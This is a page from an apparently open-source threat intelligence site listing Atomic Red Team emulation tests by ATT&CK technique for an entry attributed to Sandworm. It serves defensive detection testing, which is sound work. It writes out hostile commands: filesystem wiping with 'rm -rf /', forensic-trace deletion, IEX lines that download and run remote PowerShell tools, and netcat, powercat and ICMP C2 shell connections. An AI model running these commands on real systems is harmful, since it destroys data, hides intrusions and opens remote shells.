shelevatedlinux, macosemacs spawning an interactive system shell

sudo emacs -Q -nw --eval '(term "/bin/sh &")'

T1059.005 Visual Basic · 3 tests

powershellwindowsVisual Basic script execution to gather local computer information

cscript "#{vbscript}" > $env:TEMP\T1059.005.out.txt

powershellwindowsEncoded VBS code execution

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"

powershellwindowsExtract Memory via VBA

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract"

T1070 Indicator Removal · 2 tests

command_promptelevatedwindowsIndicator Removal using FSUtil

fsutil usn deletejournal /D C:

powershellwindowsIndicator Manipulation using FSUtil

if (-not (Test-Path "#{file_to_manipulate}")) { New-Item "#{file_to_manipulate}" -Force } 
echo "1234567890" > "#{file_to_manipulate}"
fsutil  file setZeroData offset=0 length=#{file_data_length} "#{file_to_manipulate}"

T1070.004 File Deletion · 11 tests

shlinux, macosDelete a single file - FreeBSD/Linux/macOS

rm -f #{file_to_delete}

shlinux, macosDelete an entire folder - FreeBSD/Linux/macOS

rm -rf #{folder_to_delete}

shlinuxOverwrite and delete a file with shred

shred -u #{file_to_shred}

command_promptwindowsDelete a single file - Windows cmd

del /f #{file_to_delete}

command_promptwindowsDelete an entire folder - Windows cmd

rmdir /s /q #{folder_to_delete}

powershellwindowsDelete a single file - Windows PowerShell

Remove-Item -path #{file_to_delete}

powershellwindowsDelete an entire folder - Windows PowerShell

Remove-Item -Path #{folder_to_delete} -Recurse

shlinuxDelete Filesystem - Linux

[ "$(uname)" = 'Linux' ] && rm -rf / --no-preserve-root > /dev/null 2> /dev/null || chflags -R 0 / && rm -rf / > /dev/null 2> /dev/null

powershellelevatedwindowsDelete Prefetch File

Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0])

powershellwindowsDelete TeamViewer Log Files

New-Item -Path #{teamviewer_log_file} -Force | Out-Null
Remove-Item #{teamviewer_log_file} -Force -ErrorAction Ignore

command_promptelevatedwindowsClears Recycle bin via rd

rd /s /q %systemdrive%\$RECYCLE.BIN

T1071 Application Layer Protocol · 1 test

powershellwindowsTelnet C2

#{client_path} #{server_ip} --port #{server_port}

T1071.001 Web Protocols · 3 tests

powershellwindowsMalicious User Agents - Powershell

Invoke-WebRequest #{domain} -UserAgent "HttpBrowser/1.0" | out-null
Invoke-WebRequest #{domain} -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null
Invoke-WebRequest #{domain} -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null
Invoke-WebRequest #{domain} -UserAgent "*<|>*" | out-null

command_promptwindowsMalicious User Agents - CMD

#{curl_path} -s -A "HttpBrowser/1.0" -m3 #{domain} >nul 2>&1
#{curl_path} -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain} >nul 2>&1
#{curl_path} -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain} >nul 2>&1
#{curl_path} -s -A "*<|>*" -m3 #{domain} >nul 2>&1

shlinux, macosMalicious User Agents - Nix

curl -s -A "HttpBrowser/1.0" -m3 #{domain}
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain}
curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain}
curl -s -A "*<|>*" -m3 #{domain}

T1082 System Information Discovery · 25 tests

command_promptwindowsSystem Information Discovery

systeminfo
reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum

shmacosSystem Information Discovery

system_profiler
ls -al /Applications

shlinux, macosList OS Information

uname -a >> #{output_file}
if [ -f /etc/lsb-release ]; then cat /etc/lsb-release >> #{output_file}; fi
if [ -f /etc/redhat-release ]; then cat /etc/redhat-release >> #{output_file}; fi   
if [ -f /etc/issue ]; then cat /etc/issue >> #{output_file}; fi
if [ -f /etc/os-release ]; then cat /etc/os-release >> #{output_file}; fi
uptime >> #{output_file}
cat #{output_file} 2>/dev/null

bashelevatedlinuxLinux VM Check via Hardware

if [ -f /sys/class/dmi/id/bios_version ]; then cat /sys/class/dmi/id/bios_version | grep -i amazon; fi
if [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/product_name | grep -i "Droplet\|HVM\|VirtualBox\|VMware"; fi
if [ -f /sys/class/dmi/id/chassis_vendor ]; then cat /sys/class/dmi/id/chassis_vendor | grep -i "Xen\|Bochs\|QEMU"; fi
if [ -x "$(command -v dmidecode)" ]; then sudo dmidecode | grep -i "microsoft\|vmware\|virtualbox\|quemu\|domu"; fi
if [ -f /proc/scsi/scsi ]; then cat /proc/scsi/scsi | grep -i "vmware\|vbox"; fi
if [ -f /proc/ide/hd0/model ]; then cat /proc/ide/hd0/model | grep -i "vmware\|vbox\|qemu\|virtual"; fi
if [ -x "$(command -v lspci)" ]; then sudo lspci | grep -i "vmware\|virtualbox"; fi
if [ -x "$(command -v lscpu)" ]; then sudo lscpu | grep -i "Xen\|KVM\|Microsoft"; fi

bashelevatedlinuxLinux VM Check via Kernel Modules

sudo lsmod | grep -i "vboxsf\|vboxguest"
sudo lsmod | grep -i "vmw_baloon\|vmxnet"
sudo lsmod | grep -i "xen-vbd\|xen-vnif"
sudo lsmod | grep -i "virtio_pci\|virtio_net"
sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc"

shlinuxFreeBSD VM Check via Kernel Modules

kldstat | grep -i "vmm"
kldstat | grep -i "vbox"

command_promptwindowsHostname Discovery (Windows)

hostname

shlinux, macosHostname Discovery

hostname

command_promptwindowsWindows MachineGUID Discovery

REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid

powershellwindowsGriffon Recon

cscript "#{vbscript}"

command_promptwindowsEnvironment variables discovery on windows

set

shlinux, macosEnvironment variables discovery on freebsd, macos and linux

env

shmacosShow System Integrity Protection status (MacOS)

csrutil status

powershellwindowsWinPwn - winPEAS

$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
winPEAS -noninteractive -consoleoutput

powershellwindowsWinPwn - itm4nprivesc

$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
itm4nprivesc -noninteractive -consoleoutput

powershellwindowsWinPwn - Powersploits privesc checks

$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
oldchecks -noninteractive -consoleoutput

powershellwindowsWinPwn - General privesc checks

$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
otherchecks -noninteractive -consoleoutput

powershellwindowsWinPwn - GeneralRecon

$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Generalrecon -consoleoutput -noninteractive

powershellwindowsWinPwn - Morerecon

$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Morerecon -noninteractive -consoleoutput

powershellwindowsWinPwn - RBCD-Check

$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
RBCD-Check -consoleoutput -noninteractive

powershellwindowsWinPwn - PowerSharpPack - Watson searching for missing windows patches

$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpWatson.ps1')
Invoke-watson

powershellwindowsWinPwn - PowerSharpPack - Sharpup checking common Privesc vectors

$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpUp.ps1')
Invoke-SharpUp -command "audit"

powershellwindowsWinPwn - PowerSharpPack - Seatbelt

$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1')
Invoke-Seatbelt -Command "-group=all"

powershellelevatedazure-adAzure Security Scan with SkyArk

Import-Module "PathToAtomicsFolder\..\ExternalPayloads\AzureStealth.ps1" -force      
$Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
Connect-AzAccount -Credential $Credential
Connect-AzureAD -Credential $Credential
Scan-AzureAdmins -UseCurrentCred

shlinuxLinux List Kernel Modules

lsmod
kmod list
grep vmw /proc/modules

T1083 File and Directory Discovery · 9 tests

command_promptwindowsFile and Directory Discovery (cmd.exe)

dir /s c:\ >> #{output_file}
dir /s "c:\Documents and Settings" >> #{output_file}
dir /s "c:\Program Files\" >> #{output_file}
dir "%systemdrive%\Users\*.*" >> #{output_file}
dir "%userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*" >> #{output_file}
dir "%userprofile%\Desktop\*.*" >> #{output_file}
tree /F >> #{output_file}

powershellwindowsFile and Directory Discovery (PowerShell)

ls -recurse
get-childitem -recurse
gci -recurse

shlinux, macosNix File and Directory Discovery

ls -a >> #{output_file}
if [ -d /Library/Preferences/ ]; then ls -la /Library/Preferences/ > #{output_file}; fi;
file */* *>> #{output_file}
cat #{output_file} 2>/dev/null
find . -type f
ls -R | grep ":$" | sed -e 's/:$//' -e 's/[^-][^\/]*\//--/g' -e 's/^/ /' -e 's/-/|/'
locate *
which sh

shlinux, macosNix File and Directory Discovery 2

cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > #{output_file}
if [ -f /etc/mtab ]; then cat /etc/mtab >> #{output_file}; fi;
find . -type f -iname *.pdf >> #{output_file}
cat #{output_file}
find . -type f -name ".*"

powershellwindowsSimulating MAZE Directory Enumeration

$folderarray = @("Desktop", "Downloads", "Documents", "AppData/Local", "AppData/Roaming")
Get-ChildItem -Path $env:homedrive -ErrorAction SilentlyContinue | Out-File -append #{File_to_output}
Get-ChildItem -Path $env:programfiles -erroraction silentlycontinue | Out-File -append #{File_to_output}
Get-ChildItem -Path "${env:ProgramFiles(x86)}" -erroraction silentlycontinue | Out-File -append #{File_to_output}
$UsersFolder = "$env:homedrive\Users\"
foreach ($directory in Get-ChildItem -Path $UsersFolder -ErrorAction SilentlyContinue)
{
foreach ($secondarydirectory in $folderarray)
 {Get-ChildItem -Path "$UsersFolder/$directory/$secondarydirectory" -ErrorAction SilentlyContinue | Out-File -append #{File_to_output}}
}
cat #{File_to_output}

powershellwindowsLaunch DirLister Executable

Start-Process "#{dirlister_path}"
Start-Sleep -Second 4
Stop-Process -Name "DirLister"

command_promptwindowsESXi - Enumerate VMDKs available on an ESXi Host

echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"

shlinuxIdentifying Network Shares - Linux

findmnt -t nfs

powershellwindowsRecursive Enumerate Files And Directories By Powershell

$out = "#{output_file}"
$dirsFilter = @('Documents','Downloads','Desktop','OneDrive')
$exts = @('.pdf','.doc','.docx','.xls','.xlsx','.txt','.zip','.rar','.7z')
$userProfile = [Environment]::GetFolderPath('UserProfile')
$tr = [System.Collections.Generic.List[string]]::new()

function MatchesExtension($path) {
  try {
    $e = [System.IO.Path]::GetExtension($path).ToLower()
    return $exts -contains $e
  } catch { return $false }
}

function Scan-Dir($root) {
  try {
    $match = $false
    foreach ($f in $dirsFilter) { if ($root -like "*$f*") { $match = $true; break } }
    if (-not $match) { return }

    [System.IO.Directory]::EnumerateFiles($root) | ForEach-Object {
      if (MatchesExtension $_) {
        $fi = [System.IO.FileInfo]::new($_)
        $tr.Add("[File] $_ Size:$($fi.Length) LastWrite:$($fi.LastWriteTime)")
      }
    }

    [System.IO.Directory]::EnumerateDirectories($root) | ForEach-Object {
      Scan-Dir $_
    }
  } catch [System.UnauthorizedAccessException] {
    $tr.Add("[AccessDenied] $root")
  } catch {
    $tr.Add("[Error] $root => $($_.Exception.Message)")
  }
}

[System.IO.Directory]::EnumerateDirectories($userProfile) | ForEach-Object { Scan-Dir $_ }

# Ensure output dir exists
$outDir = [System.IO.Path]::GetDirectoryName($out)
if (-not [string]::IsNullOrEmpty($outDir) -and -not (Test-Path $outDir)) {
  New-Item -Path $outDir -ItemType Directory -Force | Out-Null
}

# Write results
$tr | Out-File -FilePath $out -Encoding UTF8
Write-Output "Enumeration complete. Results written to: $out"

T1090.001 Internal Proxy · 3 tests

shlinux, macosConnection Proxy

export #{proxy_scheme}_proxy=#{proxy_server}:#{proxy_port}
curl #{test_url}

shmacosConnection Proxy for macOS UI

networksetup -setwebproxy #{interface} #{proxy_server} #{proxy_port}
networksetup -setsecurewebproxy #{interface} #{proxy_server} #{proxy_port}

powershellelevatedwindowsportproxy reg key

netsh interface portproxy add v4tov4 listenport=#{listenport} connectport=#{connectport} connectaddress=#{connectaddress}

T1095 Non-Application Layer Protocol · 4 tests

powershellwindowsICMP C2

IEX (New-Object System.Net.WebClient).Downloadstring('https://raw.githubusercontent.com/samratashok/nishang/c75da7f91fcc356f846e09eab0cfd7f296ebf746/Shells/Invoke-PowerShellIcmp.ps1')
Invoke-PowerShellIcmp -IPAddress #{server_ip}

powershellwindowsNetcat C2

cmd /c "#{ncat_exe}" #{server_ip} #{server_port}

powershellwindowsPowercat C2

IEX (New-Object System.Net.Webclient).Downloadstring('https://raw.githubusercontent.com/besimorhino/powercat/ff755efeb2abc3f02fa0640cd01b87c4a59d6bb5/powercat.ps1')
powercat -c #{server_ip} -p #{server_port}

manuallinuxLinux ICMP Reverse Shell using icmp-cnc

▶

Tools Used

0 mapped

Other tooling / TTPs (curation, not ATT&CK-mapped):

SANDWORM UAC-0165 CERT-UA MODERATE CONFIDENCE ATTRIBUTION

Intelligence Graph · click any node to traverse

CVETechnique ActorTool Family

drag to reposition · click any node to traverse · button top-right enlarges

External lookups - second-class, for what we don’t hold ourselves

MITRE search Malpedia Google

Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities

Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs

Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures

Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1

About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service

threatengine.sh · Open-source threat intelligence platform · 100+ authoritative sources · Every fact traces to its origin

RoarBAT